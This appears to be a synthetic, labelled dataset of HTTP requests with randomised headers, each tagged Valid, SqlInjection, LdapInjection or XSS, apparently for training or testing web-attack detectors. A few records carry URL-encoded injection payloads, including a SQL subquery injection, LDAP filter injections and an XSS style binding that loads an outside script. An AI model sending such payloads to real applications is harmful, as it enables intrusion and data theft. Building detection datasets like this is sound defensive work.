Pragma: y1nyat=Ti1be
Proxy-Authorization: NTLM bW9zbzZtbGVydGMyZXM3RW1vaXRSNGR1b2hyem51ZXY=
Authorization: NTLM czFmZHVhbW9pc281c2lyMWVyZUVoaWxhNU9ucWVsczB0TUJuOHVlbGJMaWhl
Range: -11289
Referer: /itaisass/qaszA0/oDId/e3aehh.jpg
TE: chunked;q=0.5,gzip,trailers
Trailer: Range
User-Agent: f_DXD4F http://www.b8RaaU.ch
UA-CPU: MIPS
UA-Disp: 041,9154,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 1153x567
Via: HTTP/4.3 38.129.21.85
Transfer-Encoding: compress
Upgrade: liaory/2.2, awo4ag/4.5, oil/7.5, ctOl/2.3, see/4.6
Warning: 891 153.235.102.59 "cOto1fzuiSiEocefsa" 
X-Forwarded-For: 221.42.137.170
X-Serial-Number: 611965021882313
----: -----------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 41648
Start - Id: 24074
class: Valid
GET /dp0au-3OpAv@9/aE/tecroocil6eias3en/etmt3eemotbw/dHzHL.43REuN46m/MCu5WtGwget-f.l/1srtRieof4ngeDipd8/hEtb0X1.6BBRcfR@DV.swf?xtow=u&msln4ioalts=l&genaineY3ose=66517613&lo8=o_0&57Cdimgr_yt3Ik=7877&VzaJ3YWmxWI4=stdinis&nTE=3250621&evalKexecNwherecmd8.Ls0=60988 HTTP/1.1
Host: 226.206.78.88
Connection: close
Accept: image/png
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: max-stale
Client-ip: 14.170.18.171
Cookie: nwlwtivowtrot=9331096932
Cookie2: $Version="8"
Date: Tue, 18 Apr 06 13:33:02 UTC
ETag: "d_8F95v.Kymd-y1"
Expect: tlafwRq=toesrhEa
From: ihrtss@aubcoeh.be
If-Modified-Since: Mon, 06 Apr 09 02:36:02 CET
If-Unmodified-Since: Mon, 26 Dec 05 09:11:21 UTC
If-Match: "KaW0IWbF805mN8q"
If-None-Match: "aAO-35peVdu3KVB"
If-Range: Wed, 28 Mar 07 08:11:57 CET
Max-Forwards: 2
MIME-Version: 8.4
Pragma: heOQ='tt4a'
Proxy-Authorization: NTLM dWw5ZWJpbTJydHJ0dGZpSm9hdGFzdWtubW5JcU51ZWlidkptVXRkZ3V1Nk9pRQ==
Authorization: Digest nc=9BA9084e
Range: 97098-,8076-,1747-
Referer: /ihyap/Cioa/liltx/rak1.jpg
TE: trailers,trailers,gzip
Trailer: Accept-Charset
User-Agent: Mozilla/8.0 (Windows; U; Windows NT 0.1; Nt-hm; rv:0.0.7) Gecko/63694944
UA-CPU: x86
UA-Disp: 176,3441,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 775x0014
Via: HTTP/4.4 162.202.160.169, 7.5 www.sdRl.jpg
Transfer-Encoding: identity
Upgrade: mexkvt/9.3, jmu/8.9, itee/9.6, hik0q/1.1, fi3/2.5
Warning: 205 199.45.173.96:14 "rotui9h8te" 
X-Forwarded-For: 147.32.251.83
X-Serial-Number: 0084225845225079837
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24074
Start - Id: 42489
class: SqlInjection
GET /a_R1X/79a/0yi6esof/ewrbacihiiye1Ssepsp/yjSeb/Q-UZ/fja0fdipsjtyesc0Hetx/kEVcZ.3i4.nsf?Udahnfmeos=sggbge&5R@httpsXT4O=iar&PInjmoymludnlia=or+++++0%3C%3E%28select++++count%28*%29++from+od8tlpe%29 HTTP/1.0
Host: www.nraeoIba.org
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: iso-8859-8, iso-8859-9;q=0.9, windows-1255;q=0.5
Accept-Encoding: compress;q=0.3, compress, identity, compress, compress
Accept-Language: rsasy5-ctRt2, netyeb-ca6h;q=0.3, cyo9omye-ec;q=0.7
Cache-Control: x1eee=lehelvrp
Client-ip: 215.176.56.170
Cookie: mtermtcairtfyHp=egKoae]y;tenEtapu=ah;nf5lhy=6015892;ygaYedafrnoetc=r8MuKzqIe9;RcY3KO=h
Cookie2: $Version="2"
Date: Mon, 06 Oct 08 20:07:31 CET
ETag: W/"5YJ9gTlr.4GpRna"
Expect: 100-continue
From: sheo@RafNi.uk
If-Modified-Since: Thu, 29 Jan 04 12:20:29 CET
If-Unmodified-Since: Tue, 06 Sep 05 14:11:54 CET
If-Match: *
If-None-Match: "iwq@3s2mgcWRUKiF0P0R"
If-Range: Sun, 19 Dec 04 19:07:29 CET
Max-Forwards: 28
MIME-Version: 8.5
Pragma: em=eqCs
Proxy-Authorization: tnrr qtclsQSi=e3eg
Authorization: NTLM a2U3Zmk2dGVrT1RybURzMGVuTXN6Z2RuT2loc2Vuc2V1bWVzY3BpYmtycw==
Range: 7-59040
Referer: http://www.ebtnTnot.de/iemmn9o/ai49ecp/Io6on/EdNrc.tiff
TE: trailers,chunked;q=0.2
Trailer: Transfer-Encoding
User-Agent: t6Inu (i_HTg6ar; rG7sT7drf; onYel4; om-oawQ2WE; aCR6m9e8ZX)
UA-CPU: x86
UA-Disp: 6364,160,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 733x829
Via: 3.9 140.81.172.120, 9.7 225.193.128.98
Transfer-Encoding: bnknM1; 9Rwn=qdoe
Upgrade: ihs/6.9, sw1v/7.0, tkg/8.2, rtlu/7.8, heTt/3.6
Warning: 682 9.47.244.88 "t7gglstsHoti" "Mon, 21 Jan 08 24:54:57 UTC"
X-Forwarded-For: 25.37.30.27
X-Serial-Number: 029543372781579317
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42489
Start - Id: 15155
class: Valid
GET /3Ugi/RlctcAyr7ltzfac/dsLFGx/s39nfGU.E./atewnhGos/i9ZRZ2L0CL2sStSZTA4/ltdf4N0B2j7gt/r2F7nXJdiwK0x2jew9/divopenJ8Y_9j.WmpaH/wGseahozimV/reUd8prndheIs23ot.jpeg?eiieeann0mmr=Tbraxrs&documentliz=ehdetmpIf8irornS&iioHrnn0nsras=r+%5Cphp5ye%5Dscriptecki HTTP/1.1
Host: www.enrc54asc.fr:591
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: 1wane-2ee
Cache-Control: max-stale=389
Client-ip: 86.108.75.63
Cookie: 5OgfIc_IEF5=eLhYQxkwu;0cinrd=nJnEELTyDikt;se=sVDGBCn.9Mm;dh=zFFpot3BdQH;G5l2j@vGL=vY0ZUull4tRh
Cookie2: $Version="929"
Date: Sat, 20 Nov 04 17:29:13 UTC
ETag: "0uLjov9Nslyl1Um57Gg"
Expect: 100-continue
From: 7stnsn@lhythtbTtd.it
If-Modified-Since: Tue, 13 Nov 07 20:25:38 UTC
If-Unmodified-Since: Sun, 11 Nov 07 12:46:00 GMT
If-Match: "nHlCTQRm7y-4@uzkVjRz"
If-None-Match: *
If-Range: Wed, 03 Dec 08 20:08:09 GMT
Max-Forwards: 153
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Basic aW1laXA6dHFmZWRhcA==
Authorization: 8ahea onean=siN7a
Range: -96,366774-,-767
Referer: http://www.eprewiFt.st/gteh/twes/tproehI.aspx
TE: deflate
Trailer: Host
User-Agent: Mozilla/6.8 (Windows; U; WinNT 4.6; 0f-js; rv:1.1.2) Gecko/02476765
UA-CPU: StrongARM
UA-Disp: 1668,172,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1372x650
Via: HTTP/5.0 www.nlesemt.htm, HTTP/4.6 www.jjl7fg.htm
Transfer-Encoding: compress
Upgrade: Yfo7e/1.2, ocsh/0.2, E0p4oi/1.3
Warning: 615 120.85.45.38 "inrt" 
X-Forwarded-For: 79.50.237.25
X-Serial-Number: 54307917779872
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15155
Start - Id: 27556
class: Valid
GET /R6n0At18t66q/e-4dg_YE5EVVUu-Y/d_Glp30z9DyZW3/eImVi4HmnTMMFmulYlmf/OOiCDL.copyUn/https5uaFqupdateoTs2aP3/t0ex5H_a3GLO/aOMDfjJGDPx6QF5ZzS3.png?lwmioRop3eeto=e%5Clir4R&nn0ihxncs=bt&ee5str=tat&keoItqd=112506219&XfM9b=246565358&fEt9runrs8oai=keacceptUgm%7C73+gaZde&btze2oin=430&8zdnkqab3eec=4&nt=18352395 HTTP/1.0
Host: 1.132.160.4
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 43.118.104.43
Cookie: etljx=3a7UmmtbOL;n6errjs=copye;en=aZ1O-xnJwnd;GLLN02A=76382;ruoavc9btpt1bw=npe;H1A0fl=eiaana >uip0dmner ne
Cookie2: $Version="6"
Date: Mon, 27 Jun 05 03:49:58 CET
ETag: "9ZCxqi6vbsm4MmPpj"
Expect: shete=A2xRIa9
From: rn1otcn@tde51wqd.st
If-Modified-Since: Sun, 26 Jun 05 08:09:05 GMT
If-Unmodified-Since: Sun, 05 Oct 08 21:35:42 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 31 May 04 01:20:46 CET
Max-Forwards: 9
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Basic aWFvc2lmOmVlaGFzMw==
Authorization: NTLM b2J0QWVhb2Fpcm9NdXNpZGdlVGM5ZXlnOWQybnJBemFO
Range: 85626-
Referer: http://www.rweIr.cz/pmmaeie/Ltsse7/lmhioir/nesw.css
TE: trailers,trailers,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/0.1 (Windows; U; Win 9x 6.5; ii-lt; rv:8.4.6) Gecko/58558069
UA-CPU: StrongARM
UA-Disp: 883,733,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 412x989
Via: qnE/7.7 30.127.248.193, 0.6 68.50.160.193
Transfer-Encoding: compress
Upgrade: tqtyi/0.3, 5aftHf/0.4, ifhtn/3.3, ntdsF/5.0
Warning: 039 www.arkr.tiff:90 "Gazauhqtpdrsdhhh" "Sat, 20 Feb 10 16:03:50 GMT"
X-Forwarded-For: 49.154.202.141
X-Serial-Number: 76901665181608584434
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 27556
Start - Id: 13857
class: Valid
GET /niWbascpates3tanne8/.fmhq4rmuxtermEay/vUnaccept_LTW_.PL.htm?k9qi=26716647&mtnO=621953&maillY71s=r2Kc1FK&sarRteGz=aiqd&ratnla=292 HTTP/1.1
Host: 4.165.119.99
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.7, compress;q=0.6, gzip;q=0.2, deflate;q=0.3, identity
Accept-Language: xUdcog-rffSne;q=0.1, sdow-fnr0t;q=0.8, am-iYist, lr-shdgst;q=0.6
Cache-Control: min-fresh=926
Client-ip: 124.143.227.1
Cookie: access_log8kDJ0zb=93340;ceaa=063251;-9XAB=eeba;nmRmbshdtrygOae=410494263;Ddht=190163166
Cookie2: $Version="94"
Date: Sat, 18 Sep 04 24:00:47 CET
ETag: "4eicoZb4j.NDYmsb"
Expect: aceiilri
From: icse@bldetb.uk
If-Modified-Since: Wed, 07 Jan 09 02:54:57 CET
If-Unmodified-Since: Fri, 25 Jan 08 09:35:01 UTC
If-Match: *
If-None-Match: ".YxrrTHbhH7hbb-Q3oWk"
If-Range: *
Max-Forwards: 0547
MIME-Version: 4.6
Pragma: ia='vh'
Proxy-Authorization: Digest uri=http://jtniUa0.be/sshsYek/edee/srituvaa/attl.msf
Authorization: strae xsee=a1lnrnio
Range: -918417
Referer: http://www.aaceez.com/ejdtga/dSolnj/tqmi/wirpP.swf
TE: deflate,trailers,deflate
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.2 (X11; U; Solaris 1.8; pw-ne; rv:3.9.3) Gecko/61098152
UA-CPU: 68000
UA-Disp: 4060,2972,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 750x449
Via: FTP/9.3 54.123.53.210
Transfer-Encoding: identity
Upgrade: dee/6.6, qx6San/1.4, EaHU/5.9, nHtl/9.9, narr/5.4
Warning: 484 241.93.184.248:77 "o0ohbhcf" "Fri, 27 Apr 07 20:20:14 UTC"
X-Forwarded-For: 225.116.111.136
X-Serial-Number: 2424153746137739
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13857
Start - Id: 38588
class: LdapInjection
GET /FuwpassthruRmixhttpihkwy/nS47@brhUBfwxRxD/03l1baarl/tXo/i_e.asp?ocorrsra0n=h9C&hh7sAwttceeFnD=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.1
Host: www.nMeat.biz:80
Connection: close
Accept: */*;q=0.6
Accept-Charset: ks_c_5601-1987;q=0.5, x-mac-icelandic;q=0.9
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 41.219.136.17
Cookie: ny0uloro=eaetisndto2rtenn;oa6Ie1=2iB8_S;emya=1651213
Cookie2: $Version="7"
Date: Thu, 27 Sep 07 08:39:44 CET
ETag: "-JtG7_R7TXsAf9DYaiP"
Expect: 100-continue
From: pyIBk@eedSVf1mn.cz
If-Modified-Since: Thu, 29 Jan 04 05:22:33 CET
If-Unmodified-Since: Thu, 15 Jan 04 11:46:10 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 03 Jun 08 04:02:42 GMT
Max-Forwards: 082
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="0Nnzylmx"
Authorization: Digest opaque="rseh"
Range: -348176
Referer: http://st0x.net/dsorya/ilrrz/hr3vt/aiE0agy/seeu.avi
TE: trailers,trailers,deflate
Trailer: Proxy-Authorization
User-Agent: t8oioXui/7.6.0.4
UA-CPU: 68000
UA-Disp: 9162,3647,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 7804x6342
Via: 9.8 167.229.87.76:39, 4.8 www.p3i9aErn.html, 3.0 61.3.245.253
Transfer-Encoding: compress
Upgrade: teh/3.7, eErn/1.4, yrgp42/8.0, 3Ets/1.6
Warning: 494 www.yte1Tn.shtml "iewe" 
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 379109696738614
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38588
Start - Id: 29383
class: Valid
GET /edAg8jk0nJ.Gp80Ng4/Ngat/dbtamyEeatwl/lqmL4.msojZ.Eh.mspx? HTTP/1.0
Host: www.xetzetceut.net:80
Connection: close
Accept: image/*, application/*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 117.25.130.47
Cookie: dsiomrnibn=dcR;qoRHD316=992316
Cookie2: $Version="907"
Date: Wed, 09 Dec 09 12:19:59 UTC
ETag: W/"KXncEj1y55DXQgZ3NAOE"
Expect: eascesxn=TdAslls
From: osNmtbzi@essattenoe.ch
If-Modified-Since: Thu, 17 Jan 08 06:50:38 UTC
If-Unmodified-Since: Mon, 20 Sep 04 15:23:42 UTC
If-Match: *
If-None-Match: *
If-Range: "frLRXIvDy.1o5xzM"
Max-Forwards: 38
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Basic aHNod3M3cHc6YXI4b3Bl
Authorization: Digest opaque="eevra3e"
Range: 60-931,-49,8-736
Referer: /unuuS.dll
TE: trailers,chunked,deflate
Trailer: User-Agent
User-Agent: Mozilla/7.5 (Windows; U; Win 9x 5.1; l2-ti; rv:3.0.4) Gecko/29031456
UA-CPU: StrongARM
UA-Disp: 468,4853,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1934x9864
Via: 3.2 34.251.21.190, 1.7 www.Thahi.css
Transfer-Encoding: gzip
Upgrade: ntq/7.1, sstu/6.4, uCn/0.4, ane/7.2
Warning: 447 169.93.32.223 "aIpcxkf8sawnqanmjire" "Tue, 19 Aug 08 09:49:59 UTC"
X-Forwarded-For: 2.168.186.132
X-Serial-Number: 50755741783
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29383
Start - Id: 47916
class: XSS
GET /ruebi/6herybetAAreo/12rsibbA4GhH0vU45W/cuaZk7WW_zVKeRm@/i0S@9.tiff?b1iu=0483492&vvhneia9a=%3Cdiv+++style+%3D%22+++binding%3A++url%28%5Bhttp%3A%2F%2Fwww.taitan.com%2Fscript%2Fioz.aspx%5D%29%3B++%22%3E&yilytrtT87etlR=rmoNCL HTTP/1.0
Host: 53.147.112.146
Connection: close
Accept: video/quicktime;q=0.6, image/*;q=0.1
Accept-Charset: *;q=0.6
Accept-Encoding: compress, deflate
Accept-Language: mcomo-aatc;q=0.6, a-tMiT6c;q=0.4, at-rsft
Cache-Control: max-stale
Client-ip: 93.12.193.202
Cookie: 7FUacceptxQwWmzo=wd6f25Ij0p;i5wemclsid1aosI=<aeaapshttpaeyIwnthe;7Y46wZk=i0n
Cookie2: $Version="7"
Date: Thu, 24 Jan 08 03:07:18 UTC
ETag: W/"FxFIMkqEChMJ8o8cBQ"
Expect: miJlaez
From: es4Wewg@gthaea.de
If-Modified-Since: Tue, 01 Sep 09 11:55:50 UTC
If-Unmodified-Since: Sat, 16 Dec 06 17:55:34 UTC
If-Match: "G8@J4gzT6_jbAXe4ANwj"
If-None-Match: *
If-Range: Sat, 21 Apr 07 12:52:03 GMT
Max-Forwards: 285
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic emllZWVlOnpnYWU=
Authorization: NTLM ZXNnc25vdG5uZGVjTWhpZThyNjdlaXRya3B0ZHNpb3N0dXpyeWZvcnR4
Range: -419,3-
Referer: http://www.i55ss7et.be/ooesquri/orifi.nsf
TE: trailers,trailers
Trailer: If-Range
User-Agent: dwEtitvxpw/7.7.7
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 229x467
Via: l5wfb/8.9 www.wntd.png, biI/4.3 22.76.168.86:48658, esV/7.9 www.0Xoptaee.htm
Transfer-Encoding: gzip
Upgrade: anee5/8.2, scSotq/7.5, 3th/0.1, krezts/1.0
Warning: 342 www.a3Idnne.js "aeea" "Tue, 23 Feb 10 05:56:33 UTC"
X-Forwarded-For: 90.98.250.32
X-Serial-Number: 03181480810
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47916
Start - Id: 31382
class: Valid
GET /ubReitirhiieto/Loshehaseesiiatha/4uOOG/oanyohneiirm9Ionrtmt.msf? HTTP/1.0
Host: 174.57.193.94
Connection: close
Accept: application/*, image/png;q=0.4
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: hen-nhnd, ihmla-methiss;q=0.1, nno-O;q=0.5, e-9css, nt-mlt
Cache-Control: no-transform
Client-ip: 248.191.216.133
Cookie: connectboot.iniWY8scriptRvX=in u|iodhee&'as;Ea;hioastsaHfEhese=bLmFvotestwellax;sijeIrr=a3rme;0eutqmpeiraeirA=lmnfltsnxee
Cookie2: $Version="970"
Date: Sun, 03 May 09 22:01:19 GMT
ETag: W/"qBvb8IB9g@7ld@Ek1"
Expect: 100-continue
From: Tzeuatea@eoges.de
If-Modified-Since: Wed, 10 Dec 08 05:59:44 GMT
If-Unmodified-Since: Tue, 15 Sep 09 06:42:28 CET
If-Match: *
If-None-Match: "VQ8X.mKZMz3Rdva2is"
If-Range: Thu, 28 Sep 06 01:00:55 GMT
Max-Forwards: 703
MIME-Version: 3.5
Pragma: rni='evh'
Proxy-Authorization: NTLM dGVyZHluZW5zcHNkbmFwYWVST2VlamlucGlMaXV0Ym50YU9vY2k=
Authorization: NTLM ZXdic3JlbjM1ZnRyZWltN3R3eXRtdGVlbWFpdHM4aWx1bnd3Nw==
Range: 214-,6423-,-75701
Referer: /tbridg/c3inN.swf
TE: gzip;q=0.7,trailers
Trailer: Pragma
User-Agent: Mozilla/4.5 (compatible; MSIE 4.7; Linux i586; Tmeo)
UA-CPU: Sparc
UA-Disp: 6015,3763,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2355x254
Via: FTP/9.4 www.eoa8S.shtml, 5.4 www.noiH.htm, HTTP/9.8 120.14.32.41
Transfer-Encoding: compress
Upgrade: ruexiD/5.5
Warning: 398 226.241.76.108 "setlnsfmby7bt1eaniq" "Fri, 18 Aug 06 14:43:39 UTC"
X-Forwarded-For: 122.12.60.197
X-Serial-Number: 33047995554498
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31382
Start - Id: 29592
class: Valid
GET /ziframe_v5BadminTwNvar/dX/i848z5ZQW/afg9etetdso/e2iLO2AT_UBU70s/XONswudPL@Jq8/nSHt9gfY77az6AO/GY6MrD/sHsocn/vr0i9rag7rn/duwXyuE/Isealuneli1s.aspx?f0soiyEepalI=336&oEmme3cnap=dIZdSWBrA&5JRtIZ=ede+group+bythttpsp%5Drboot.initx&ktrr=te&fZ8G-boGy2=l&sdett=uhUTio&_jPcwSA7=wq2hImde0a HTTP/1.1
Host: 120.243.56.130:80
Connection: keep-alive
Accept: image/gif;q=0.3
Accept-Charset: *
Accept-Encoding: identity;q=0.0, compress;q=0.1, identity;q=0.9
Accept-Language: 5-t;q=0.4, egs-tdr;q=0.5, i-yt0F
Cache-Control: wongNatm=t5nec
Client-ip: 82.106.229.95
Cookie: Nrnaoksi0tse=ecc24ych
Cookie2: $Version="8"
Date: Wed, 13 May 09 23:11:15 UTC
ETag: W/"CvEck.0p7o6t3wgUsg"
Expect: edtr=arModEp;srcteJa
From: d1em@0njeio.be
If-Modified-Since: Sat, 30 Dec 06 17:05:25 CET
If-Unmodified-Since: Fri, 25 Dec 09 04:48:50 GMT
If-Match: "9WmahyubzUer@F7"
If-None-Match: "cPj68nJbliOdxgSWCP"
If-Range: Fri, 28 Nov 08 07:22:51 UTC
Max-Forwards: 12
MIME-Version: 6.8
Pragma: use='anlmnfeu'
Proxy-Authorization: rrTV htn2fsu=ieee
Authorization: wazo rinrtq=nuTeTtfa
Range: -074,-900485
Referer: http://www.w9wk.org/teaDs/uYtio/6gtCa/cZtes.php4
TE: gzip;q=0.5,trailers
Trailer: If-Unmodified-Since
User-Agent: n8abn3hao1ttwo
UA-CPU: 68000
UA-Disp: 872,513,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 3909x9569
Via: 9.1 www.rem7msst.jpg:0908, nad1nT/0.2 176.24.99.202, FTP/6.9 183.237.233.193
Transfer-Encoding: deflate
Upgrade: okle/3.6, Ort/3.8, hew/6.7
Warning: 552 www.eghciu.html "MEdi" "Thu, 09 Jun 05 12:22:53 GMT"
X-Forwarded-For: 41.83.226.161
X-Serial-Number: 755614
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 29592
Start - Id: 38267
class: LdapInjection
GET /ceedimdEbwsierercir/sj3oodrhsdds8/yiffRehsdlincG/tw/9mjFVf5/oG.iPVY.lfvis5.dll?barotgTtaxs=rtaccess_log&qkenAXiw=%29+++%28%7C+%28eei%3Dnxnt*%29&Hurth=eldd1&xpLwget8PVG@I=aycopyvEsa+ei%3Caes4https%2Bhxterms&2wu8n=apeaPD1Yfeaw0Qric&gpwaeecd=35885002 HTTP/1.1
Host: www.tdtedhh.it
Connection: keep-alive
Accept: audio/*;q=0.1, application/x-tar;q=0.3, image/*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: sri-ngyi;q=0.1
Cache-Control: only-if-cached
Client-ip: 135.46.160.61
Cookie: hrrebEcnnef=59
Cookie2: $Version="03"
Date: Mon, 07 Aug 06 13:21:59 GMT
ETag: "VDe5kizShh_rfWhBy1J"
Expect: 100-continue
From: iaon@um9ltetugp.biz
If-Modified-Since: Tue, 21 Mar 06 09:28:53 GMT
If-Unmodified-Since: Sun, 19 Jun 05 03:59:19 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 29 Oct 04 05:09:26 UTC
Max-Forwards: 0567
MIME-Version: 6.7
Pragma: ahcgitt='9alT70Lm'
Proxy-Authorization: NTLM ZXJydTFhY2xuaHV5YTBsYWFlZHVlbmF3aXJkbnV0aW10YQ==
Authorization: Basic RG90bWQ6OWVhZXRzaA==
Range: 97538-,1799-
Referer: http://www.cretdb2o.uk/xlnirsO/i5n5Mhef/Rmbb/th2jdq/nde3Ra.bin
TE: trailers,gzip;q=0.7,trailers
Trailer: Proxy-Authorization
User-Agent: 2JZg-oN http://www.bcthases.cz
UA-CPU: PowerPC
UA-Disp: 284,6564,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 4041x0261
Via: 7.2 207.85.189.179
Transfer-Encoding: compress
Upgrade: tme6o5/8.8
Warning: 420 www.hNfxAea.shtml "ha5earnepwc" "Thu, 20 Jan 05 10:55:49 UTC"
X-Forwarded-For: 169.43.23.55
X-Serial-Number: 05796287611
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38267
Start - Id: 20942
class: Valid
GET /saM0Zenlnxlndors2s/Ehdt/igfuochHhijl/eJzViOC6hOeUpw47qlL./dDx3e9/hoYC1t_epcXafrM6q/eedQiF5E.php3?oriofApme=+b7at5i0oo&Yoptchildx-M=1&Rn=55531&nssTkotutidNsIt=pnp&FdorppeLt=c-L5.xcnu HTTP/1.0
Host: 82.115.177.221:043
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 241.218.51.172
Cookie: cncabhzysafc2=28424;d7ttegR2=232
Cookie2: $Version="078"
Date: Mon, 07 Jan 08 11:33:23 UTC
ETag: W/"@SwYjNEfjZMf_Kh4ulGE"
Expect: 2sye
From: d011d@jsutlttae.it
If-Modified-Since: Sat, 05 Nov 05 04:16:15 UTC
If-Unmodified-Since: Sat, 22 Jul 06 01:39:54 GMT
If-Match: *
If-None-Match: "2U55OYQCCzeJkqL1"
If-Range: *
Max-Forwards: 298
MIME-Version: 7.9
Pragma: he='o0a'
Proxy-Authorization: NTLM dGZtU3JiZGludDNZeW5pZWFkb3d5QXRiYTByemVzdDlzcGxpdmVuaWhsVGU=
Authorization: Digest uri=/hahT9oo/aogao.htm
Range: -237,00-,0218-17
Referer: http://u7bWels3.com/hdoHo/zihtpFn.nsf
TE: chunked;q=0.7,gzip;q=0.2,trailers
Trailer: Connection
User-Agent: ckMnd@ http://www.uosrr0.ch
UA-CPU: x86
UA-Disp: 289,3069,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2279x9563
Via: 7.2 www.avmwhan.tiff, HTTP/9.4 www.34esoUn.jpg:4
Transfer-Encoding: compress
Upgrade: de7/0.8, frcre/7.5
Warning: 769 82.151.248.203 "e9sq" "Thu, 13 Oct 05 11:11:34 UTC"
X-Forwarded-For: 251.229.233.197
X-Serial-Number: 2430605
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20942
Start - Id: 33791
class: Valid
POST /oROEGDoGV-B0gWX.jpeg? HTTP/1.1
Content-Length: 157
Content-Language: ivoeh0e,bpe2ilr
Content-Encoding: deflate
Content-Location: /he5wpiri.php
Content-MD5: dG9tbnNlb2VhZWlhUnJyYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 28 Jan 05 10:37:43 CET
Last-Modified: Mon, 01 May 06 15:51:38 UTC
Host: 219.50.174.138
Connection: ntlTad
Accept: */*;q=0.0
Accept-Charset: *;q=0.2
Accept-Encoding: compress;q=0.3, deflate;q=0.7, gzip;q=0.8, identity
Accept-Language: *
Cache-Control: max-stale=691
Client-ip: 11.4.165.212
Cookie: NT=XisVAzt7pohtonrn;sao5gttnwr=85;3v.pQdgroup byW=136855;simt4vutowt=auvar;bgsoundafGv0=i3oen\o t;Kmi5tfter=hiheatR8d lpassthru
Cookie2: $Version="2"
Date: Sat, 24 Dec 05 07:41:43 UTC
ETag: W/"vnTj-doAgiGXWhCBA"
Expect: c9cyhx
From: dmRxngT@spiuhlni.ch
If-Modified-Since: Fri, 29 Oct 04 23:24:16 GMT
If-Unmodified-Since: Tue, 11 May 04 11:41:45 GMT
If-Match: "wVTuChQjZcOn1bu3o@K"
If-None-Match: *
If-Range: "v1rO6@C@h672-a."
Max-Forwards: 068
MIME-Version: 0.9
Pragma: 5i0hsnys='kaub'
Proxy-Authorization: Digest nc=C6E9d90C
Authorization: Basic ZW5xMXM1aDplZWh1c20=
Range: 26855-,847-,-23
Referer: http://taseu.gov/eteled5R/faTt8ej/ictuhc.jpg
TE: trailers
Trailer: If-Modified-Since
User-Agent: i2tiltai/6.5.7.2.1
UA-CPU: StrongARM
UA-Disp: 384,417,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 402x308
Via: 2Er/3.6 www.tRese.jpg, HTTP/4.3 www.olrnjtHA.tiff
Transfer-Encoding: compress
Upgrade: ca5umo/2.1, neaa/3.0
Warning: 964 www.iae6.js "rnaaenmimaot" 
X-Forwarded-For: 152.153.32.113
X-Serial-Number: 9495993319607061113
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

oesEN=r7&sg=gr&ntoodtlyeeon=sDN&w0nxtermjA=527173&nt=szs-EBFFz8&le1tdulN=n&ft=d98l&JOTHnrZKy=enCorl+&4sefb7to=edse v& r9id|trkd&oi2h04ngrsowDm=63385724

End - Id: 33791
Start - Id: 1794
class: Valid
